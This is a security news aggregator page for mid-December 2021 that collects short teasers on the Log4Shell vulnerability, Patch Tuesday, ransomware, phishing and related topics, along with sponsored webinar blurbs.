Sat.Dec 11, 2021 - Fri.Dec 17, 2021

article thumbnail

When is a Scrape a Breach?

Troy Hunt

A decade and a bit ago during my tenure at Pfizer, a colleague's laptop containing information about customers, healthcare providers and other vendors was stolen from their car. The machine had full disk encryption and it's not known whether the thief was ever actually able to access the data. It's not clear if the car was locked or not.

article thumbnail

Banks Must Report Cyber Incidents Beginning in May 2022

Lohrman on Security

U.S. financial institutions are leaders in global cyber defense. Recently approved rules will mandate the reporting of security incidents next year. We explore the topic with cybersecurity expert Michael McLaughlin.

Banking 320
Insiders

Sign Up for our Newsletter

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

article thumbnail

Microsoft Patch Tuesday, December 2021 Edition

Krebs on Security

Microsoft , Adobe , and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month’s Patch Tuesday is overshadowed by the “ Log4Shell ” 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.

Internet 297
article thumbnail

More Log4j News

Schneier on Security

Log4j is being exploited by all sorts of attackers, all over the Internet: At that point it was reported that there were over 100 attempts to exploit the vulnerability every minute. “Since we started to implement our protection we prevented over 1,272,000 attempts to allocate the vulnerability, over 46% of those attempts were made by known malicious groups,” said cybersecurity company Check Point.

Internet 286
article thumbnail

IDC Analyst Report: The Open Source Blind Spot Putting Businesses at Risk

In a recent study, IDC found that 64% of organizations said they were already using open source in software development with a further 25% planning to in the next year. Most organizations are unaware of just how much open-source code is used and underestimate their dependency on it. As enterprises grow the use of open-source software, they face a new challenge: understanding the scope of open-source software that's being used throughout the organization and the corresponding exposure.

article thumbnail

Weekly Update 274

Troy Hunt

As I start out by saying this week's video, it's very summer here and not a day goes by without multiple pool visits. Next week's video is going to be from somewhere epically amazing out of this world that I've wanted to go to for a long time now so stay tuned for that one as I go mobile again. Somehow, today's video stretched out beyond an hour with what felt like a list of pretty minor discussion points, but plenty of good questions and commentary along the way.

Mobile 291
article thumbnail

New Microsoft Exchange credential stealing malware could be worse than phishing

Tech Republic Security

While looking for additional Exchange vulnerabilities in the wake of this year's zero-days, Kaspersky found an IIS add-on that harvests credentials from OWA whenever, and wherever, someone logs in.

Phishing 217

More Trending

article thumbnail

11 penetration testing tools the pros use

CSO Magazine

A penetration tester, sometimes called an ethical hacker, is a security pro who launches simulated attacks against a client's network or systems in order to seek out vulnerabilities. Their goal is to demonstrate where and how a malicious attacker might exploit the target network, which allows their clients to mitigate any weaknesses before a real attack occurs.

article thumbnail

Hackers start pushing malware in worldwide Log4Shell attacks

Bleeping Computer

Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. In this article we compiled the known payloads, scans, and attacks using the Log4j vulnerability. [.].

Malware 145
article thumbnail

Critical Log4Shell security flaw lets hackers compromise vulnerable servers

Tech Republic Security

Apache has patched the vulnerability in its Log4j 2 library, but attackers are searching for unprotected servers on which they can remotely execute malicious code.

212
212
article thumbnail

Finding “Attackable” Open Source Vulnerabilities in JavaScript

Security Boulevard

Finding attackable open source vulnerabilities in JS applications with an intelligent SCA approach. Open Source Software (OSS) is at the core of today’s information technology. About 80% of companies run their operations on OSS and 96% of applications are built using open source components. Most of today’s commercial products are shipped with some OSS libraries.

Software 144
article thumbnail

Beware of Pixels & Trackers on U.S. Healthcare Websites

The healthcare industry has massively adopted web tracking tools, including pixels and trackers. Tracking tools on user-authenticated and unauthenticated web pages can access personal health information (PHI) such as IP addresses, medical record numbers, home and email addresses, appointment dates, or other info provided by users on pages and thus can violate HIPAA Rules that govern the Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates.

article thumbnail

9 video chat apps compared: Which is best for security?

CSO Magazine

The COVID-19 pandemic forced companies to scramble to accommodate employees suddenly working from home. This required a move to cloud-based infrastructures, mobile applications and good collaboration and conferencing tools. The shift was massive for most firms. According to Statista , only 17% of workers in the United States telecommuted even a little prior to the pandemic.

Mobile 145
article thumbnail

Log4Shell vulnerability: What we know so far

We Live Security

The critical flaw in the ubiquitous Log4j utility has sent shockwaves way beyond the security industry – here’s what we know so far. The post Log4Shell vulnerability: What we know so far appeared first on WeLiveSecurity.

143
143
article thumbnail

Botnet steals half a million dollars in cryptocurrency from victims

Tech Republic Security

The botnet uses a tactic called crypto clipping, which relies on malware to steal cryptocurrency during a transaction, says Check Point Research.

article thumbnail

Apache Log4j Threatens, Well, Everything

Security Boulevard

It doesn’t get much worse than this, at least according to cybersecurity experts. The RCE bug currently being actively exploited in the widely used Apache Log4j promises to leave a trail of damage and destruction in its wake, even for those who quickly take action against it. “This is a worst-case scenario. The combination of. The post Apache Log4j Threatens, Well, Everything appeared first on Security Boulevard.

article thumbnail

Software Composition Analysis: The New Armor for Your Cybersecurity

Speaker: Blackberry, OSS Consultants, & Revenera

Software is complex, which makes threats to the software supply chain more real every day. 64% of organizations have been impacted by a software supply chain attack and 60% of data breaches are due to unpatched software vulnerabilities. In the U.S. alone, cyber losses totaled $10.3 billion in 2022. All of these stats beg the question, “Do you know what’s in your software?

article thumbnail

Amazon explains the cause behind Tuesday’s massive AWS outage

Bleeping Computer

Amazon has published a post-event summary to shed some light on the root cause behind this week's massive AWS outage that took down a long list of high-profile sites and online services, including Ring, Netflix, Amazon Prime Video, and Roku. [.].

article thumbnail

Hackers exploit Log4Shell to drop Khonsari Ransomware on Windows systems

Security Affairs

Bitdefender researchers discovered that threat actors are attempting to exploit the Log4Shell flaw to deliver the new Khonsari ransomware on Windows machines. Bitdefender researchers discovered that threat actors are attempting to exploit the Log4Shell vulnerability ( CVE-2021-44228 ) to deliver the new Khonsari ransomware on Windows machines. Experts warn that threat actors are attempting to exploit the Log4Shell flaw to deliver the new Khonsari ransomware on Windows machines.

article thumbnail

How to install Qubes OS as a virtual machine

Tech Republic Security

Qubes OS defines itself modestly as "a reasonably secure operating system." It might actually be one of the safest operating systems, often used by pros who are most concerned with computer security.

177
177
article thumbnail

NSO Zero-Click Exploit: Turing-Complete CPU in Image File

Security Boulevard

Researchers have reverse engineered NSO group’s recent zero-click iPhone exploit. And it’s a doozy. The post NSO Zero-Click Exploit: Turing-Complete CPU in Image File appeared first on Security Boulevard.

article thumbnail

From Complexity to Clarity: Strategies for Effective Compliance and Security Measures

Speaker: Erika R. Bales, Esq.

When we talk about “compliance and security," most companies want to ensure that steps are being taken to protect what they value most – people, data, real or personal property, intellectual property, digital assets, or any other number of other things - and it’s more important than ever that safeguards are in place. Let’s step back and focus on the idea that no matter how complicated the compliance and security regime, it should be able to be distilled down to a checklist.

article thumbnail

What SMBs can do to protect against Log4Shell attacks

Malwarebytes

As you may already know, the business, tech, and cybersecurity industries have been buzzing about Log4Shell ( CVE-2021-44228 ), aka Logjam, the latest software flaw in an earlier version of the Apache Log4j logging utility. As the name suggests, a logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.

article thumbnail

Conti ransomware uses Log4j bug to hack VMware vCenter servers

Bleeping Computer

Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines. [.].

article thumbnail

The 10 worst password snafus of 2021

Tech Republic Security

Dashlane's sixth annual list of the year's worst password offenders reveals the biggest password security mishaps for 2021.

Passwords 215
article thumbnail

Securing Kubernetes With XDR

Security Boulevard

Kubernetes is at the forefront of the container orchestration market. A majority of organizations running container workloads manage at least some of them via Kubernetes. However, according to the Red Hat State of Kubernetes Security report, 94% of organizations encountered a serious security incident within their container environment. Of these, 69% of these incidents were.

Marketing 141
article thumbnail

Successful Change Management with Enterprise Risk Management

Speaker: William Hord, Vice President of ERM Services

A well-defined change management process is critical to minimizing the impact that change has on your organization. Leveraging the data that your ERM program already contains is an effective way to help create and manage the overall change management process within your organization. Your ERM program generally assesses and maintains detailed information related to strategy, operations, and the remediation plans needed to mitigate the impact on the organization.

article thumbnail

5 warning signs your identity has been stolen

We Live Security

By spotting these early warning signs of identity theft, you can minimize the impact on you and your family. The post 5 warning signs your identity has been stolen appeared first on WeLiveSecurity.

article thumbnail

A phishing campaign targets clients of German banks using QR codes

Security Affairs

Cofense researchers discovered a new phishing campaign using QR codes targeting German e-banking users in the last weeks. Threat actors continue to use multiple techniques to avoid detection and trick recipients into opening phishing messages, including the use of QR codes. The messages used in a campaign recently discovered by cybersecurity firm Cofense use QR codes to deceive users of two Geman financial institutions, Sparkasse and Volksbanken Raiffeisenbanken, and steal digital banking inform

Banking 139
article thumbnail

Log4j: How to protect yourself from this security vulnerability

Tech Republic Security

As cybercriminals scan for susceptible servers, there are steps you can take to mitigate the Log4j critical vulnerability.

212
212
article thumbnail

Ransomware Actors Attack Most Often on Fridays

Security Boulevard

Criminals are detonating ransomware at targeted organizations seven days a week, leaving enterprises with essentially no time to shore up their security operations. But a recent study revealed that Friday was the most popular day for ransomware attackers to strike, perhaps attempting to capitalize on employees’ desire to leave for the weekend and the anticipated.

article thumbnail

Cover Your SaaS: How to Overcome Security Challenges and Risks For Your Organization

Speaker: Ronald Eddings, Cybersecurity Expert and Podcaster

So, you’ve accomplished an organization-wide SaaS adoption. It started slow, and now just a few team members might be responsible for running Salesforce, Slack, and a few others applications that boost productivity, but it’s all finished. Or is it? Through all the benefits offered by SaaS applications, it’s still a necessity to onboard providers as quickly as possible.

article thumbnail

Three ways banks can ensure a sustainable future

CyberSecurity Insiders

North American audiences are demanding sustainable corporate initiatives more than ever.??Both large financial institutions as well as community banks and credit unions are responding to growing awareness to step up pro-environmental standards from various stakeholders including consumers, employees, investors, competitors, eco-system partners and government entities.?

Banking 137
article thumbnail

Protecting against Log4j with Secure Firewall & Secure IPS

Cisco Security

The Apache Log4j vulnerability (CVE-2021-44228) has taken the Internet by storm in the past few days. This blog details quick ways Secure Firewall Threat Defense (FTD) and Secure IPS users can protect against attacks leveraging this vulnerability while patching their infrastructure. Talos first released updated Snort rules on Friday, December 10. For customers inspecting ingress traffic— with decryption if traffic is TLS (Transport Layer Security) encrypted — these rules will alert and can bloc

Firewall 136
article thumbnail

Kodachi is the operating system for those who value privacy but don't want to learn Linux

Tech Republic Security

For anyone looking to gain an extra layer of privacy on a desktop or laptop, Kodachi Linux might be the perfect option. Jack Wallen highlights this live Linux distribution.

173
173
article thumbnail

Boost your Cyber Security Awareness

Security Boulevard

October is Cyber Security Awareness month. Cyber Security Awareness month was officially launched by the National Cyber Security Alliance (NCSA) and the Department of Homeland Security (DHS) in October of 2004. At first, the effort was aimed around common cyber security facts and advice. Since then, the two organizations have worked collaboratively to provide education, […].

article thumbnail

How Preparation and Strategy Can Be Used to Fight and Defeat Any Ransomware Attack

Speaker: Karl Camilleri, Cloud Services Product Manager at phoenixNAP

Did you know that 2021 was a record-breaking year for ransomware? The days of a “once in a while” attack against businesses and organizations are over. Cyberthreats have become a serious issue. With 495.1 million attacks, the threat marked a 148% increase compared to 2020 and was the most expensive year on record! As a result, data protection needs to be a concern for most banks, businesses, and information technology specialists.